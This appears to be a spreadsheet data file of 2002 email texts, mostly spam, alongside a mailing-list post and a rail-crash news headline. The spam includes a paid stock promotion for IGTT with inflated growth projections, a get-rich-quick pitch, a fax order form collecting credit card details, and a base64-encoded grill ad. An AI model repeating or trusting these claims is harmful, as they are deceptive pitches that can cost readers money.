 Make payable to &lt;b&gt;Grant Gold 2002&lt;/b&gt;.&lt;br&gt;
 &lt;br&gt;
 &lt;/center&gt;
 Grant Gold 2002&lt;br&gt;
 P. O. Box 36&lt;br&gt;
 Dayton, Ohio  45405&lt;br&gt;
 &lt;br&gt;
 If you would like to order via Fax, please include your credit card information below and fax to our Fax Line.&lt;br&gt;
 OUR 24 HOUR FAX NUMBER:  775-257-6657.
 &lt;br&gt;&lt;br&gt;
 *****
 Important Credit Card Information! Please Read Below!&lt;br&gt;&lt;br&gt;
 *     Credit Card Address, City, State and Zip Code, must match billing address to be processed. 
 &lt;br&gt;&lt;br&gt;
 CHECK____  MONEYORDER____  VISA____ MASTERCARD____ AmericanExpress___ Debt Card___
 &lt;br&gt;&lt;br&gt;
 Name_______________________________________________________&lt;br&gt;
 (As it appears on Check or Credit Card)&lt;br&gt;
 &lt;br&gt;
 Address____________________________________________________&lt;br&gt;
 (As it appears on Check or Credit Card)&lt;br&gt;
 &lt;br&gt;
 ___________________________________________________&lt;br&gt;
 City,State,Zip(As it appears on Check or Credit Card)&lt;br&gt;
 &lt;br&gt;
 ___________________________________________________&lt;br&gt;
 (Credit Card Number)&lt;br&gt;
 &lt;br&gt;
 Expiration Month_____  Year_____&lt;br&gt;
 &lt;br&gt;
 ___________________________________________________&lt;br&gt;
 Email Address (Please Write Neat)&lt;br&gt;
 &lt;br&gt;
 ___________________________________________________&lt;br&gt;
 Authorized Signature
 &lt;p&gt;
 &lt;font size="1"&gt;
 We apologize for any email you may have inadvertently
 received.&lt;br&gt;
 Please &lt;a target="_blank"  href =
 "http://www.mysoftwarefouruu.com/remove.htm" &gt;CLICK
 HERE&lt;/a&gt; to unsubscribe from future
 mailings.&lt;/font&gt;&lt;br&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">I think there's a link to all the details on welcomehome.org, but 
 basically it was told to me this way: govt wanted land in arizona or someplace, 
 indians said no, govt said 'okay, u know that land in MS u want?  we will 
 fux0r it, then.'  indians still said no, govt fux0red it.
 C
 On Wed, 31 Jul 2002, Elias Sinderson wrote:
 &gt; Heh. Never mind the perfectly good desert in the southwest, right? Or is 
 &gt; that area too hot for desert warfare training? I'll never understand.
 &gt; 
 &gt; E
 &gt; 
 &gt; CDale wrote:
 &gt; 
 &gt; &gt;Okay, I'll ammend that to LIVE OLD tree saving, like the thousands of 
 &gt; &gt;acres of virgin pine forest that was razed here in MS so that our military 
 &gt; &gt;can practice desert warfare?  Fought it for years, lost, now there is a 
 &gt; &gt;stand of trees up and down Hwy 49 that's supposed to try to hide the fact 
 &gt; &gt;that a huge portion of the Desoto Ntl. Forest is gone.
 &gt; &gt;
 &gt; 
 &gt; 
 &gt; http://xent.com/mailman/listinfo/fork
 &gt; 
 -- 
 "My theology, briefly, is that the universe was dictated but not
           signed."  (Christopher Morley) 
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Rail crash bereaved sue over line safety
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8418825,215/
 Date: 2002-10-01T04:33:59+01:00
 *UK latest:* Potters Bar claimants' group investigates reason for accident as 
 it dismisses Railtrack's compensation offer.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The Hottest Business In America is Open..Everyone Welcome
</t>
  </si>
  <si>
    <t xml:space="preserve">
 There Are Only A Few Things Needed to Be Successful:
 You need a multi-billion dollar, ground floor opportunity with the most 
 sought after product in an untapped market that has people clearing $60,000 
 their first month and $20,000 per week after 8 weeks. You need full support 
 from the start so your growth potential is unlimited.
 Click here for your FREE special report.
 http://www.18w6j3g4wrr5s.com/user2/index.htm
 To Be Remove From Further Mailings reply to http://www.18w6j3g4wrr5s.com/remove/ with remove in the subject line.. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Telecom Consolidation Begins to Accelerate................... hrlb
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;IGTT&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000"&gt;
 &lt;img src="http://www.developerhosting.com/lqtracker/imgtrk.asp?id=40165&amp;uid=1290" width="1" height="1" border="0"&gt; 
 &lt;div align="center"&gt;
 &lt;table width="92%" border="1" bordercolor="#333333"&gt;
 &lt;tr&gt; 
 &lt;td height="23"&gt; 
 &lt;div align="center"&gt;
 &lt;div align="center"&gt;
 &lt;div align="center"&gt; 
 &lt;div align="center"&gt;
 &lt;p align="right"&gt;&lt;font color="#000000" size="2" face="Courier New, Courier, mono"&gt;Vol. 
 6, Issue 243 - August 2002&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font size="6"&gt;&lt;font face="Impact" size="7" color="#FF0000"&gt;The 
 Wall Street Bulletin&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;&lt;font color="#FF0000"&gt;&lt;i&gt;&lt;font size="4" face="Times New Roman, Times, serif"&gt;&lt;b&gt;&lt;font size="3"&gt;Your 
 First Source For News From &amp;quot;The Street&amp;quot;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/i&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;p align="center"&gt;Symbol: &lt;b&gt;&lt;font color="#FF0000"&gt;IGTT&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 Shares Outstanding: 373,400,0000&lt;br&gt;
 Float (est.): 52,560,000&lt;br&gt;
 Short-Term Target: $3.75&lt;br&gt;
 52 week High/Low: $1.10/0.02&lt;br&gt;
 Rating: Strong Buy &lt;/p&gt;
 &lt;p align="center"&gt;&lt;font size="3" color="#000000"&gt;&lt;b&gt;Our last pick 
 Symphony Telecom (OTCBB: SYPY) went UP 100% in just one week!!!&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font color="#000000" size="3"&gt;&lt;em&gt;InDigiNet Identifies 
 Acquisition Targets with Combined Revenues of $35 Million...&lt;/em&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;strong&gt;Telecom Consolidation Begins to Accelerate 
 &lt;/strong&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;font size="5"&gt;T&lt;/font&gt;he Wall Street Bulletin believes 
 that the &lt;a href="http://moneycentral.msn.com/content/P26293.asp?special=msn"&gt;recent 
 investment of capital into Level 3, lead by Warren Buffett&lt;/a&gt;, 
 is further proof of the continued validity of the telecommunication 
 market when looked at from the perspective of the small to mid-sized 
 enterprises. After the boom and bust comes the revival. For some 
 carriers drowning in debt, such as Global Crossing and WorldCom, 
 the future may be dim. But for those survivors of the industry 
 that have managed to remain on their feet, other companies' problems 
 mean opportunity. &amp;quot;Every major industry in the history of 
 the United States has experienced a similar transformation, from 
 the railroads in the late 1800s to the automakers in the mid-1900s 
 to the Dot-Coms at the end of the 20th century,&amp;quot; says &lt;a href="http://www.commweb.com/article/COM20010403S0001"&gt;Robert 
 Saunders&lt;/a&gt;, director of the Eastern Management Group market 
 research firm. &lt;a href="http://www.eftia.com/about/exec/dean.html"&gt;Christopher 
 Dean&lt;/a&gt;, CTO of OSS company Eftia, says &amp;quot;We are seeing all 
 the people that are the survivors. There's all this pent-up money 
 and for the surviving carriers out there, they can get what used 
 to cost a few billion for a few millions.&amp;quot; &lt;em&gt;Read the full 
 story from Telecommunications Magazine - See the link at the end 
 of this newsletter.&lt;/em&gt; &lt;/p&gt;
 &lt;p align="left"&gt;As we write this report, our New Recommendation 
 InDigiNet, Inc. (&lt;a href="http://moneycentral.msn.com/scripts/webquote.dll?ipage=qd&amp;Symbol=igtt&amp;SUBMIT1=Go"&gt;OTCBB: 
 IGTT&lt;/a&gt;) has only been trading on the OTC Bulletin Board since 
 late May of 2002. As InDigiNet, Inc. continues to implement its 
 business plan, we believe this company will help lead the way 
 up for the resurgence of the Telecom Sector. This could be our 
 strongest recommendation of the year. We are giving IGTT our Highest 
 Rating of STRONG BUY/AGGRESSIVE GROWTH.&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;strong&gt;Ground Floor Opportunity / Tremendous 
 Growth Potential &lt;/strong&gt;&lt;/p&gt;
 &lt;p align="left"&gt;We believe IGTT will perform equally to, if not 
 greater than its competition. A similar telecommunications company, 
 Talk America Holdings (Nasdaq: TALK), &lt;a href="http://bigcharts.marketwatch.com/quickchart/quickchart.asp?symb=talk&amp;sid=0&amp;o_symb=talk&amp;freq=1&amp;time=7"&gt;share 
 price began to explode in April of this year moving from just 
 over $0.40/share to over $4.00/share in late June&lt;/a&gt;. Talk America 
 Holdings previously had a market cap of only $24.51 million, but 
 today has a market cap of $267 million.&lt;/p&gt;
 &lt;p align="left"&gt;IGTT curently has a market cap of $22.42 million. 
 Using the TALK model for potential growth, IGTT could very well 
 be trading in the .60 range in only a few months, with a market 
 cap in excess of $250 million. This would be an increase of 1000%. 
 So you see why IGTT has such great potential and the time is right 
  for investors to get in on the ground floor.&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;strong&gt;The &lt;em&gt;InDigNet&lt;/em&gt; Strategy&lt;/strong&gt;&lt;/p&gt;
 &lt;p align="left"&gt;InDigiNet, Inc. is an integrated solutions company 
 that provides small to mid-sized enterprises (SMEs) with an integrated 
 communication solution. InDigiNet is a prestigious &lt;a href="http://tools.thestreet.com/tsc/quotes.html?pg=qcn&amp;guid=%7B35CA79AF-6477-4734-90E1-97EC3455E773%7D&amp;symb=igtt&amp;sid=692861&amp;orig=1&amp;timer="&gt;&amp;quot;Diamond&amp;quot; 
 level partner of Avaya&lt;/a&gt;, as well as a reseller for Cisco and 
 Compaq. The Company will offer data, local, long distance and 
 wireless services to SMEs over third party networks enabling the 
 Company to offer a comprehensive suite of services without the 
 capital burden of building a communication network. The Company&amp;#8217;s 
 strategy is to acquire the customer bases of smaller, single market 
 communication companies and attractively priced &lt;a href="http://webopedia.com/TERM/I/ISP.html"&gt;Internet 
 Service Providers &lt;/a&gt;(ISPs). &lt;em&gt;The Company recently completed 
 its acquisitions of Fox Telecommunications and WBConnect&lt;/em&gt;. 
 InDigiNet will then expand the breadth of their services to grow 
 revenue and enhance profitability. SMEs account for $120 billion 
 in commercial telephony, data services and technology spending, 
 or 33% of the country&amp;#8217;s total market, and this spending 
 is expected to grow at above average rates over the next ten years. 
 &lt;em&gt;Source: Morgan Stanley Dean Witter&lt;/em&gt;. &lt;/p&gt;
 &lt;p align="left"&gt;The IGTT web site: &lt;a href="http://www.indiginet.com"&gt;www.indiginet.com&lt;/a&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;strong&gt;The&lt;em&gt; &lt;/em&gt;IT Market&lt;/strong&gt;&lt;/p&gt;
 &lt;p align="left"&gt;Based on recent studies, the country&amp;#8217;s 7.4 
 million SMEs currently lag significantly in the utilization of 
 &lt;a href="http://webopedia.com/TERM/I/IT.html"&gt;IT&lt;/a&gt; and data 
 communications, including Internet access, web services, business 
 software and e-commerce. Worldwide IT spending increased to $981 
 billion US for the year, an overall increase of 3.7 percent over 
 2001, according to a study released 7/24/2002 by market researcher 
 IDC. IT spending in 2003 is expected to reach record heights, 
 growing by 9 percent worldwide to top the $1 trillion mark for 
 the first time. In IDC's revised forecasts for IT spending in 
 2002 and 2003, IT spending in the US is expected to increase by 
 3 percent this year over 2001 to $436 billion, with further growth 
 of 9 percent in 2003. Western Europe can expect growth of 4 percent 
 in 2002 and 6 percent in 2003. Though Japan will experience flat 
 growth levels this year, by next year growth in the market will 
 return to the tune of 7 percent with particular strength shown 
 in China, India, Korea, Russia, the Philippines, South Africa 
 and Poland. &lt;em&gt;Source: &lt;a href="http://www.idc.com/en_US/st/aboutIDC.jhtml;jsessionid=2J2GJSTTFNK4MCTFA4FCFGAKMUDYWIWD"&gt;IDC&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;strong&gt;Particulars&lt;/strong&gt;&lt;/p&gt;
 &lt;p align="left"&gt;The Wall Street Bulletin is putting IGTT on our 
 Strong Buy/Aggressive Growth recommendation list for the following 
 reasons:&lt;/p&gt;
 &lt;p align="left"&gt;1. The Company's strategy is to acquire the customer 
 bases of smaller, single-market communication companies and attractively 
 priced Internet Service Providers (ISPs). The Company will sell 
 its bundled service package to the acquired customer base that 
 will form a direct and immediate distribution channel for all 
 types of communication services - local, long distance, wireless, 
 and data. &lt;/p&gt;
 &lt;p align="left"&gt;&lt;br&gt;
 2. The Company is currently serving many customers in the Denver/Front 
 Range communities but in particular the education vertical market 
 has recognized the value of integrating a wireless broadband data 
 network into the existing campus network. The Company's customers 
 include &lt;a href="http://www.usoc.org/"&gt;United States Olympic Committee&lt;/a&gt; 
 (USOC), &lt;a href="http://www.du.edu/"&gt;University of Denver&lt;/a&gt;, 
 and &lt;a href="http://www.colostate.edu/"&gt;Colorado State University&lt;/a&gt;. 
 &lt;/p&gt;
 &lt;p align="left"&gt;&lt;br&gt;
 3. The Company has identified approximately $35,000,000 in revenues 
 to acquire comprised of distressed assets to be auctioned in bankruptcy 
 court and smaller communication providers with valuable customer 
 bases. Each of the targeted companies are within the Company's 
 footprint and will, subject to purchase completion, increase the 
 Company's embedded customer base. &lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;strong&gt;Investment Consideration&lt;/strong&gt;&lt;/p&gt;
 &lt;p align="left"&gt;InDigiNet Inc recently filed its 10QSB, for the 
 three months ended March 31, 2002. IGTT reported Revenues of $339,694 
 in Q1 2002 vs. Revenues of $0 in Q1 2001. At this current growth 
 rate, revenues should grow above $1.3 million for their first 
 year of production with no increases in acquisitions. As more 
 and more large corporations come under government scrutiny, investors 
 will turn to small to mid-sized companies with their investment 
 dollars. &lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="left"&gt;NEWS - InDigiNet, Inc. Completes Acquisition of 
 Fox Telecommunications, Inc. - &lt;em&gt;PRNewswire - &lt;/em&gt;&lt;a href="http://tools.thestreet.com/tsc/quotes.html?pg=qcn&amp;guid=%7B42FC3A33-75F2-4246-AFBE-0FF24082C128%7D&amp;symb=igtt&amp;sid=692861&amp;orig=1&amp;timer="&gt;CLICK 
 HERE&lt;/a&gt;&lt;/p&gt;
 &lt;p align="left"&gt;NEWS - InDigiNet, Inc. Completes Acquisition of 
 WBConnect&lt;em&gt; - PRNewswire&lt;/em&gt; - &lt;a href="http://tools.thestreet.com/tsc/quotes.html?pg=qcn&amp;guid=%7B5877DA16-41D7-4F15-942D-BE31B81F38A7%7D&amp;symb=igtt&amp;sid=692861&amp;orig=1&amp;timer="&gt;CLICK 
 HERE&lt;/a&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="left"&gt;NEWS - Telecom Consolidation Begins to Accelerate 
 - from &lt;em&gt;Telecommunications Magazin&lt;/em&gt;e - &lt;a href="http://www.telecomflash.com/default.asp?journalid=5&amp;func=articles&amp;page=070205&amp;year=2002&amp;month=7&amp;rsno=5"&gt;CLICK 
 HERE&lt;/a&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="left"&gt;Industry Interests - Telecommunications Websites: 
 &lt;a href="http://www.tiaonline.org/"&gt;TIA Online&lt;/a&gt; - &lt;a href="http://www.telecoms-mag.com/"&gt;Telecommunications 
 Magazine&lt;/a&gt; - &lt;a href="http://www.itworld.com/"&gt;IT World&lt;/a&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font size="3"&gt;&lt;b&gt;&lt;font color="#666666"&gt;The Wall 
 Street Bulletin is an independent newsletter and is not affiliated 
 with InDigiNet, Inc.&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;font size="1"&gt;The Wall Street Bulletin is an independent 
 research firm. This report is based on The Wall Street Bulletin&amp;#8217;s 
 independent analysis but also relies on information supplied by 
 sources believed to be reliable. This report may not be the opinion 
 of IGTT management. The Wall Street Bulletin has also been retained 
 to research and issue reports on IGTT and was paid ten thousand 
 dollars by a shareholder of the company. The Wall Street Bulletin 
 may from time to time buy or sell IGTT common shares in the open 
 market without notice. The information contained in this report 
 is not intended to be, and shall not constitute, an offer to sell 
 or solicitation of any offer to buy any security. It is intended 
 for information only. Some statements may contain so-called &amp;#8220;forward-looking 
 statements&amp;#8221;. Many factors could cause actual results to 
 differ. Investors should consult with their Investment Advisor 
 concerning IGTT. Copyright 2002 &amp;copy; The Wall Street Bulletin 
 - All Rights Reserved&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font size="3"&gt;I no longer wish to receive your 
 newsletter &lt;a href="mailto:nomoreigtt@444.net"&gt;&lt;b&gt;CLICK 
 HERE&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="right"&gt;&lt;font color="#000000" size="3"&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/div&gt;
 &lt;/div&gt;
 &lt;/div&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 bjcrnqhbadobnenysnkcfmjiews
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The Mighty Pro Grill !                                                                                                                                ADV                                    2147PBQg-8
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ------=_NextPart_000_00E6_61E42E2B.C1032A62
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 PGh0bWw+IA0KPGhlYWQ+ICANCjxtZXRhIG5hbWU9IkdFTkVSQVRPUiIgY29u
 dGVudD0iTWljcm9zb2Z0IEZyb250UGFnZSA1LjAiPg0KPG1ldGEgbmFtZT0i
 UHJvZ0lkIiBjb250ZW50PSJGcm9udFBhZ2UuRWRpdG9yLkRvY3VtZW50Ij4N
 CjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4
 dC9odG1sOyBjaGFyc2V0PXdpbmRvd3MtMTI1MiI+DQo8dGl0bGU+SGVhbHRo
 eSBBbGwgQW1lcmljYW4gQ29va2luZyBhbGwgeWVhciByb3VuZDwvdGl0bGU+
 DQo8L2hlYWQ+DQo8Ym9keT4NCjx0YWJsZSBjZWxsU3BhY2luZz0iMCIgY2Vs
 bFBhZGRpbmc9IjAiIHdpZHRoPSIxMDAlIj4NCiAgPHRyPg0KICAgIDx0ZCB2
 QWxpZ249InRvcCIgYWxpZ249Im1pZGRsZSI+DQogICAgPHRhYmxlIGNlbGxT
 cGFjaW5nPSIwIiBjZWxsUGFkZGluZz0iMCIgd2lkdGg9IjU1NCIgYm9yZGVy
 PSIwIiBoZWlnaHQ9IjU4NyI+DQogICAgICA8dHI+DQogICAgICAgIDx0ZCB2
 QWxpZ249InRvcCIgYWxpZ249InJpZ2h0IiBoZWlnaHQ9IjU4NyI+DQogICAg
 ICAgIDxwIGFsaWduPSJjZW50ZXIiPjxhIGhyZWY9Imh0dHA6Ly93d3cud2hp
 dGVjYXJzZWF0LmNvbSI+DQogICAgICAgIDxpbWcgc3JjPSJodHRwOi8vd3d3
 LndoaXRlY2Fyc2VhdC5jb20vaW1nL2ZhbV9lbWFpbF8wMS5naWYiIGJvcmRl
 cj0iMCIgTk9TRU5EPSIxIiB3aWR0aD0iMTQxIiBoZWlnaHQ9IjIxMyI+DQoJ
 PGJyPg0KICAgICAgICA8YSBocmVmPSJodHRwOi8vd3d3LndoaXRlY2Fyc2Vh
 dC5jb20iPg0KICAgICAgICA8aW1nIGhlaWdodD0iMzciIHNyYz0iaHR0cDov
 L3d3dy53aGl0ZWNhcnNlYXQuY29tL2ltZy9mYW1fZW1haWxfY2xpY2toZXJl
 LmdpZiIgd2lkdGg9IjE0MSIgYm9yZGVyPSIwIiBOT1NFTkQ9IjEiPg0KCTwv
 YT48L3A+DQogICAgICAgIDxwIGFsaWduPSJjZW50ZXIiPg0KCSAgJm5ic3A7
 PGI+PHN0cmlrZT48Zm9udCBzaXplPSI1Ij5SZXRhaWwgUHJpY2UgJDI3Ljk1
 PC9mb250Pjwvc3RyaWtlPjwvYj48L3A+DQogICAgICAgIDxoMSBhbGlnbj0i
 Y2VudGVyIj48Zm9udCBjb2xvcj0iI2ZmMDAwMCI+PGZvbnQgc2l6ZT0iNyI+
 Tk9XIE9OTFk8L2ZvbnQ+DQogICAgICAgIDxmb250IHNpemU9IjciPiQ0Ljk1
 ITwvZm9udD48L2ZvbnQ+PC9oMT4NCiAgICAgICAgPGgxIGFsaWduPSJjZW50
 ZXIiPjxmb250IGZhY2U9InZlcmRhbmEsYXJpYWwiIHNpemU9IjIiPjxhIGhy
 ZWY9Imh0dHA6Ly93d3cud2hpdGVjYXJzZWF0LmNvbSI+DQogICAgICAgIDxp
 bWcgYm9yZGVyPSIwIiBzcmM9Imh0dHA6Ly93d3cud2hpdGVjYXJzZWF0LmNv
 bS9pbWcvbWlnaHR5cHJvLmpwZyIgd2lkdGg9IjEzOCIgaGVpZ2h0PSIxMDAi
 PjwvZm9udD48L2gxPg0KICAgICAgICA8L3RkPg0KICAgICAgICA8dGQgdkFs
 aWduPSJ0b3AiIGFsaWduPSJsZWZ0IiBoZWlnaHQ9IjU4NyI+PGEgaHJlZj0i
 aHR0cDovL3d3dy53aGl0ZWNhcnNlYXQuY29tIj4NCiAgICAgICAgPGltZyBz
 cmM9Imh0dHA6Ly93d3cud2hpdGVjYXJzZWF0LmNvbS9pbWcvZmFtX2VtYWls
 XzAyLmdpZiIgYm9yZGVyPSIwIiBOT1NFTkQ9IjEiIHdpZHRoPSI0MTMiIGhl
 aWdodD0iMTA2Ij4NCiAgICAgICAgPHAgYWxpZ249ImNlbnRlciI+PGZvbnQg
 Y29sb3I9IiNmZjAwMDAiIHNpemU9IjQiPkhlYWx0aHkgQWxsIEFtZXJpY2Fu
 IA0KICAgICAgICBDb29raW5nIGFsbCB5ZWFyIHJvdW5kICE8L2ZvbnQ+PGZv
 bnQgc2l6ZT0iNCI+IDwvZm9udD4gPC9wPg0KICAgICAgICA8dGFibGUgd2lk
 dGg9IjQxMyIgaGVpZ2h0PSIzOTIiPg0KICAgICAgICAgIDx0cj4NCiAgICAg
 ICAgICAgIDx0ZCBhbGlnbj0ibGVmdCIgaGVpZ2h0PSIzODgiPjxmb250IGZh
 Y2U9InZlcmRhbmEsYXJpYWwiIHNpemU9IjIiPk5vdyB5b3UgY2FuIA0KICAg
 ICAgICAgICAgaGF2ZSB0aGUgZ3JlYXQgdGFzdGUsIHRleHR1cmUgYW5kIGZs
 YXZvciBvZiBncmlsbGVkIGZvb2QgcmlnaHQgaW4gDQogICAgICAgICAgICB5
 b3VyIGhvbWUsIGFueXRpbWUgeWVhciAncm91bmQgd2l0aG91dCBhd2t3YXJk
 IGVxdWlwbWVudC4gVGhlIDxiPk1pZ2h0eSANCiAgICAgICAgICAgIFBybyBH
 cmlsbDwvYj4gdHVybnMgYW55IGVsZWN0cmljIG9yIGdhcyBzdG92ZSBpbnRv
 IGEgZ3JpbGxpbmcgbWFydmVsLiANCiAgICAgICAgICAgIFRoZSBub24tc3Rp
 Y2sgcHJlY2lzaW9uIGNvb2sgZ3JpbGwgcGxhdGUgc2VhcnMgdGhlIGZvb2Qg
 dG8gZ29sZGVuIA0KICAgICAgICAgICAgYnJvd24gY2hhciBncmlsbGVkIHBl
 cmZlY3Rpb24gd2hpbGUgdGhlIGZsYXZvciByaW5nIHN0ZWFtcyBiYWNrIHRo
 ZSANCiAgICAgICAgICAgIG5hdHVyYWwgZmxhdm9ycyBpbmZ1c2luZyB0aGUg
 Zm9vZCB3aXRoIGluY3JlZGlibGUgdGFzdGUuIFRoZSBncmVhc2UgDQogICAg
 ICAgICAgICBhbmQgZmF0cyByb2xsIGhhcm1sZXNzbHkgYXdheSBzbyB5b3Un
 cmUgZWF0aW5nIGxvdyBmYXQuIEdyaWxsIA0KICAgICAgICAgICAgYnVyZ2Vy
 cywgaG90IGRvZ3MsIHN0ZWFrcyBhbmQgY2hvcHMsIGNoaWNrZW4sIHNocmlt
 cCBrYWJvYnMsIGFuZCANCiAgICAgICAgICAgIG1lbHQgaW4geW91ciBtb3V0
 aCBncmlsbGVkIHZlZ2V0YWJsZXMuIFRoZSA8Yj5NaWdodHkgUHJvIEdyaWxs
 PC9iPiBldmVuIA0KICAgICAgICAgICAgZ29lcyBpbnRvIHRoZSBvdmVuIGZv
 ciBsb3cgZmF0IG1lYXQgbG9hZiBhbmQgQ29ybmlzaCBnYW1lIGhlbi4gQWxz
 byANCiAgICAgICAgICAgIGdyZWF0IGZvciBSVnMsIGJvYXRzIGFuZCBjYW1w
 ZXJzLjwvZm9udD48Zm9udCBmYWNlPSJ2ZXJkYW5hLGFyaWFsIiBzaXplPSIy
 Ij48dWw+DQogICAgICAgICAgICAgIDxsaT5TbW9rZWxlc3MgR3JpbGwgQ29u
 dmVydHMgWW91ciBTdG92ZSB0byBpbmRvb3IgQmFyYmVjdWUgPC9saT4NCiAg
 ICAgICAgICAgICAgPGxpPlVzZSBvbiBFbGVjdHJpYywgR2FzIG9yIFByb3Bh
 bmUgc3RvdmVzIDwvbGk+DQogICAgICAgICAgICAgIDxsaT5XYXRlci1GaWxs
 ZWQgb3V0ZXIgcmluZyBjYXRjaGVzIGZhdCBhbmQganVpY2VzIGR1cmluZyBj
 b29raW5nLCANCiAgICAgICAgICAgICAgZWxpbWluYXRlcyBzbW9rZSBhbmQg
 c3BsYXR0ZXJpbmcgPC9saT4NCiAgICAgICAgICAgICAgPGxpPk5vbi1zdGlj
 ayBzdXJmYWNlIGZvciBlYXN5IGNsZWFudXAgPC9saT4NCiAgICAgICAgICAg
 ICAgPGxpPk5vIGZ1c3Npbmcgd2l0aCBjaGFyY29hbCBvciB3YWl0aW5nIGZv
 ciB0aGUgZmlyZSB0byBoZWF0IHVwDQogICAgICAgICAgICAgIDwvbGk+DQog
 ICAgICAgICAgICAgIDxsaT5HcmVhdCBmb3IgY2hpY2tlbiwgZmlzaCwgc3Rl
 YWssIGhvdCBkb2dzLCBoYW1idXJnZXJzLCANCiAgICAgICAgICAgICAgdmVn
 ZXRhYmxlcywgbW9yZS4uLjwvbGk+DQogICAgICAgICAgICA8L3VsPg0KICAg
 ICAgICAgICAgPC9mb250Pg0KICAgICAgICAgICAgPC90ZD4NCiAgICAgICAg
 ICA8L3RyPg0KICAgICAgICA8L3RhYmxlPg0KICAgICAgICA8cCBhbGlnbj0i
 Y2VudGVyIj4NCiAgICAgICAgPGltZyBhbHQ9Ik1hc3RlciBDYXJkIiBzcmM9
 Imh0dHA6Ly93d3cud2hpdGVjYXJzZWF0LmNvbS9pbWcvbWNsb2dvLmdpZiIg
 Ym9yZGVyPSIwIiB3aWR0aD0iNjAiIGhlaWdodD0iMzYiPg0KCSAgPGltZyBh
 bHQ9IlZpc2EgQ2FyZCIgc3JjPSJodHRwOi8vd3d3LndoaXRlY2Fyc2VhdC5j
 b20vaW1nL3Zpc2EuZ2lmIiBib3JkZXI9IjAiIHdpZHRoPSI2MCIgaGVpZ2h0
 PSIzOCI+DQogICAgICAgIDwvdGQ+DQogICAgICA8L3RyPg0KICAgIDwvdGFi
 bGU+IA0KICAgIDwvdGQ+DQogIDwvdHI+DQo8L3RhYmxlPg0KPGRpdiBhbGln
 bj0iY2VudGVyIj4NCiAgPGNlbnRlcj4NCiAgPHRhYmxlIGJvcmRlcj0iMCIg
 Y2VsbHBhZGRpbmc9IjAiIGNlbGxzcGFjaW5nPSIwIiBzdHlsZT0iYm9yZGVy
 LWNvbGxhcHNlOiBjb2xsYXBzZSIgYm9yZGVyY29sb3I9IiMxMTExMTEiIHdp
 ZHRoPSI2MSUiIGlkPSJBdXRvTnVtYmVyMSI+DQogICAgPHRyPg0KICAgICAg
 PHRkIHdpZHRoPSIxMDAlIj48dHQ+DQogICAgICA8Zm9udCBmYWNlPSJBcmlh
 bCxIZWx2ZXRpY2Esc2Fucy1zZXJpZiIgY29sb3I9IiM4MDgwODAiIHNpemU9
 IjEiPlRISVMgDQogICAgICBNRVNTQUdFIElTIEJFSU5HIFNFTlQgSU4gQ09N
 UExJQU5DRSBXSVRIIFBFTkRJTkcgRU1BSUwgQklMTFMgJmFtcDsgTEFXUzom
 bmJzcDsgDQogICAgICBTRUNUSU9OIDMwMS4gUEVSIFNFQ1RJT04sIFBBUkFH
 UkFQSCAoYSkgKDIpIChjKSBvZiBTLiAxNjE4LiBUaGlzIG1lc3NhZ2UgDQog
 ICAgICBpcyBub3QgaW50ZW5kZWQgZm9yIHJlc2lkZW50cyBpbiB0aGUgU3Rh
 dGUgb2YgV0EsIE5WLCBDQSAmYW1wOyBWQS4gU2NyZWVuaW5nIA0KICAgICAg
 b2YgYWRkcmVzc2VzIGhhcyBiZWVuIGRvbmUgdG8gdGhlIGJlc3Qgb2Ygb3Vy
